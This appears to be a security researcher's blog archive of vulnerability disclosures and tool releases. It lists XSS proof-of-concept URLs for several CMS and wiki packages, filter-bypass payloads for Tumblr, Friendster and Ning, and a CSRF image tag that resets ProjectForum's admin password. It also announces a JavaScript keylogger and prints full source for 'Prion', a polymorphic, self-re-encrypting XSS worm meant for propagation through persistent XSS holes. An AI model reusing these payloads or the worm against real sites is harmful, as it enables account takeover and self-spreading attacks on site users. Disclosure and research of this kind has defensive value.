ImpressCMS 1.2.1 Final Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in ImpressCMS 1.2.1 Final can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

RunCMS 2.1 Magpie RSS Module Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in RunCMS 2.1 Magpie RSS Module can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E

PeteWiki 0.6 Reflected XSS

A reflected cross-site scripting vulnerability in PeteWiki 0.6 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/petewiki/index.php?show=%3Cscript%3Ealert(0)%3C/script%3E

Lion Wiki 3.2.3 Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in Lion Wiki 3.2.3 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/lionwiki/index.php?error=%3Cscript%3Ealert(0)%3C/script%3E&page=a

nuBuilder 10.04.20 Reflected XSS

An XSS vulnerability in nuBuilder 10.04.20 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/nubuilder-10.04.20/productionnu2/nuedit.php?f=%3Cscript%3Ealert(0)%3C/script%3E

News Office 2.0.18 Reflected XSS

An XSS vulnerability in News Office 2.0.18 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%3E

Bit Weaver 2.7 Reflected XSS

An XSS vulnerability in Bit Weaver 2.7 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

odCMS 1.07 Reflected XSS

An XSS vulnerability in odCMS 1.07 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/odcms/codes/archive.php?design=%3Cscript%3Ealert(0)%3C/script%3E

NetworX 1.0.3 Reflected XSS

An XSS vulnerability in NetworX 1.0.3 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Orbis 1.0.2 Reflected XSS

An XSS vulnerability in Orbis 1.0.2 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/orbis/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Wiki Web Help 0.2.7 Persistent/Reflected XSS

Several XSS vulnerabilities in Wiki Web Help 0.2.7 can be exploited to execute arbitrary JavaScript.

Exploit
Persistent: Event attributes are not removed from user submitted HTML elements.

Reflected: The rev query string field of revert.php does not HTML encode user submitted data.


PoC
Persistent: <div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div>

Reflected: http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E

ProjectForum 6.5.2.2978 XSRF / XSS

A cross-site request forgery vunlerability in ProjectForum 6.5.2.2978 can be exploited to reconfigure the server (e.g. admin password, create group password, port) with a malicious GET request.

PoC:

<html>
    <body>
        <img src="http://localhost/admin/site.html?adminpasswd=new_password&adminpasswd2=new_password&port=80&theme=default&createpasswd=new_password&createpasswd2=new_password&action=Save+Changes&formSubmitted=1" />   
    </body>
</html>

Several reflected and persistent cross-site scripting vulnerabilities are present.

PoC:
Reflected:
http://localhost/1/admin/newpage.html?name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Persistent:
Edit a page and add the following
http://"onmouseover="alert(0)"style="position:absolute;top:0;left:0;width:9999px;height:9999px;

Tumblr.com Persistent XSS

onmouseover attributes added to user submitted markup via HTTP proxy are not stripped.

Exploit: Create a new link, add a description, and set the HTML to <h1>test</h1>. Submit the form and capture the request using an HTTP proxy (e.g. Fiddler). Change the post[three] value to <h1 onmouseover="alert(0)">test</h1> and resume the request.

PoC: http://asdfffffffff.tumblr.com/

Friendster.com Persistent XSS

Data submitted via album description and a few other fields is not properly escaped before being rendered into javascript.

Exploit: \";alert(0);//

PoC: http://www.friendster.com/viewalbums.php?uid=120927091

Ning.com Persistent XSS

Less than and greater than characters submitted in the descriptions of albums, images and probably others are unencoded. Any tags submitted in such fields are subjected to whitelist validation, but this can be bypassed by prepending a less than character to the injected open and close tags.

Exploit: <<script>alert(0)//<</script>

PoC: http://coniferous.ning.com/photo/792231134-1

Javascript Keylogger 1.4 Released

A python HTTP server has been added to allow for greater cross-platform compatibility.

Download 1

Download 2

Prion 1.3 Released - Polymorphic XSS Worm

Because of Prion's large memory footprint it isn't suitable for use with every XSS vulnerability. For this reason I decided to create Prion Lite, a scaled down version of Prion small enough to be used with most XSS vulnerabilities, reflected or persistent. Of course this comes at a cost: unlike Prion, which carries its entire codebase with it, instances of the new Lite version must reference an off-site javascript file, another piece of evidence for anyone that might be looking for such things.

1.3 Changes
Cleaned up code
Prion lite added
Mickey mouse encryption algorithm updated (Prion lite only)
Reorder transformation added (Prion lite only)
Miscellaneous bug fixes

Download

Prion 1.2 Released - Polymorphic XSS Worm

Prion 1.2 is out, and it's quite an improvement over the last version. The updated encoding algorithm eliminated a lot of bloat, and the new code transformations make the decryptor of each worm instance unique.

1.2 Changes
Integer splitting transformation added
Variable rename transformation added
Added compressed version
Test UI updated

Download


/* Prion 1.2 by John Leitch - john.leitch5@gmail.com *//*worm start*/var startToken='/*worm start*/',endToken='/*worm '+'end*/';var generatedVars=new Array();function random(a,b){return Math.round((b-a)*Math.random()+a)}var varNameChars='_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';function genVarName(){var a;do{var b=random(3,14);a='';for(var i=0;i<b;i++){var r=random(0,varNameChars.length-1);a+=varNameChars[r]}}while(varUsed(a));return a}function varUsed(a){for(var i=0;i<generatedVars.length;i++){if(generatedVars[i]==a){return true}}return false}function transformInt(a,b){var c=['+','-','*','/'];var d='';for(var i=0;i<b;i++){var e=random(0,3);var f=d.match(/-?[\d\.]+/g);if(f!=null){for(var j=0;j<f.length;j++){if(f[j].indexOf('.')!=-1){f.splice(j,1);j--;continue}}if(f.length==0)break}if(d!=''){var g=f[random(0,f.length-1)];a=parseInt(g.match(/-?\d+/))}var h='';switch(e){case 0:var x=random(-1000,1000);var y=a-x;h='('+x+'+'+y+')';break;case 1:var y=random(0,1000);var x=a+y;h='('+x+'- '+y+')';break;case 2:var y=random(-1000,1000);var x=a/y;h='Math.round('+x+'*'+y+')';break;case 3:var y=random(-1000,1000);var x=a*y;h='('+x+'/'+y+')';break}if(d!=''){var k=new RegExp('([^\\d\\.]|^)'+a+'(([^\\d\\.])|$)');var l=d;d=d.replace(k,'$1'+h+'$2');try{var m=eval(d)}catch(err){alert('error evaling\r\n\r\n'+'old: '+l+'\r\n\r\n'+'new: '+d+'\r\n\r\n'+'regex: '+k+'\r\n\r\n'+'error: '+err)}}else{d=h}}return d}function encrypt(a){var b=[Math.floor(Math.random()*256),Math.floor(Math.random()*256)];var d=genVarName();var e=genVarName();var f=genVarName();var g=genVarName();var h=8;var j=transformInt(32,random(2,h));var k=transformInt(127,random(2,h));var l=transformInt(2,random(2,h));var m=startToken+'var k0='+b[0]+'\x3b'+'var k1='+b[1]+'\x3b'+'var '+d+'=\'';for(var i=0;i<a.length;i++){var c=(a.charCodeAt(i)^b[0]^b[1]).toString(16);m+=c.length==2?c:+'0'+c}m+='\'\x3bvar '+e+'=\'\'\x3b'+'for(var '+f+'=0;'+f+'<'+d+'.length;'+f+'+=2){'+'var '+g+'=parseInt('+d+'['+f+']+'+d+'['+f+'+1],16)^k0^k1\x3b'+'if('+g+'==10 || ('+g+'>='+j+' && '+g+'\x3c'+k+'))'+'{'+e+'+=String.fromCharCode('+g+')\x3b}'+''+'}'+'if('+e+'['+e+'.length-1]!=\'\x3b\'){'+e+'='+e+'.substring(0,('+e+'.length-'+l+'))\x3b'+'}'+'eval('+e+');'+endToken;return m}function findKey(a,b){var c=new RegExp('var\\sk'+b+'=(\\d+)');var d=c.exec(a);if(d==null){alert('key byte '+b+' not found');return null}return d[1]}function decrypt(a){var b=[findKey(a,0),findKey(a,1)];if(!b[0]||!b[1])return;var c=a.match(/var\s[\w_]+='([\d\w]+)'\x3b/);if(c==null){alert('packed code not found');return}var d='';var e=c[1].split(',');for(var i=0;i<c[1].length;i+=2){d+=String.fromCharCode(parseInt(c[1][i]+c[1][i+1],16)^b[1]^b[0])}return d}function findSelf(a){var x=a.indexOf(startToken)+startToken.length;var y=a.indexOf(endToken,x);var b=a.substring(x,y);b=b.replace(/\x26lt;/g,'\x3c');return b}var code=findSelf(document.body.innerHTML);if(code.indexOf('var k0=')==0){code=decrypt(code)}var encoded=encrypt(code);document.getElementById('xssWorm').innerHTML=encoded.replace(/\x3c/g,'\x26lt;');/*worm end*/

Prion 1.1 Released - Polymorphic XSS Worm

I've affectionately named my worm Prion and released a new version with several browser compatibility fixes and a new test page (embedded below). Click the execute button a few times to see it work.

Old sample removed. An updated version can be found here

Download

Polymorphic XSS Worm

Note: This entry is out of date; several fixes have been made. New download here

As the title suggests here is a generic, polymorphic XSS worm. With each infection the worm re-encrypts itself using a basic XOR cipher. The only piece missing is the code that sends the obfuscated script (stored in the encoded variable) to it's next target, likely a persistent XSS vulnerability. Below is the complete source. To see it in action save the source to an HTML file then view it. The javascript outputted to the text area is the repackaged worm; to test the repackaged source, replace the javascript of the sample below with the encrypted code and view the page again.

Polymorphic XSS Worm Source

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title>Polymorphic XSS Worm</title>   
</head>
<body>
    <textarea id="xssWorm" style="width:400px;height:600px;"></textarea>
    
    <script type="text/javascript">
        /*  Polymorphic XSS Worm by John Leitch - john.leitch5@gmail.com  */
                    
        /*worm start*/    
        var startToken = '/*worm start*/',
            endToken = '/*worm ' + 'end*/';

        function encode(code) {
            var key = Math.floor(Math.random() * 256);

            var packed = startToken + 'var k=' + key + ';var a=[';

            for (var i = 0; i < code.length; i++) {
                packed += (code.charCodeAt(i) ^ key) + ',';
            }

            packed += '];var d=\'\';' +
                'for (var i=0;i<a.length;i++)' + 
                    '{d+=String.fromCharCode(a[i]^k);}eval(d);' + endToken;

            return packed;
        }

        function decode(code) {
            var keyMatch = code.match(/var\sk=(\d+)/);

            if (keyMatch == null) {
                alert('key not found');

                return;
            }

            var key = keyMatch[1];

            var codeMatch = code.match(/var\sa=\[([\d{1,3},]+)\];/);

            if (codeMatch == null) {
                alert('packed code not found');

                return;
            }

            var unpacked = '';

            var codeBytes = codeMatch[1].split(',');

            for (var i = 0; i < codeBytes.length; i++) {
                if (!codeBytes[i]) {
                    continue;
                }

                unpacked += String.fromCharCode(codeBytes[i] ^ key);
            }

            return unpacked;
        }

        function findSelf(response) {
            var x = response.indexOf(startToken) + startToken.length;
            var y = response.indexOf(endToken, x);

            var code = response.substring(x, y);

            return code;
        }

        var code = findSelf(document.body.innerHTML);

        if (code.indexOf('var k=') == 0) {
            code = decode(code);
        }

        var encoded = encode(code);

        // This is where the newly obfuscated worm (stored in encoded)
        // is passed on to it's next target. But because we don't have a
        // target we'll spit the newly obfuscated code out to a textarea.

        document.getElementById('xssWorm').value = encoded;
        /*worm end*/
    </script>
</body>
</html>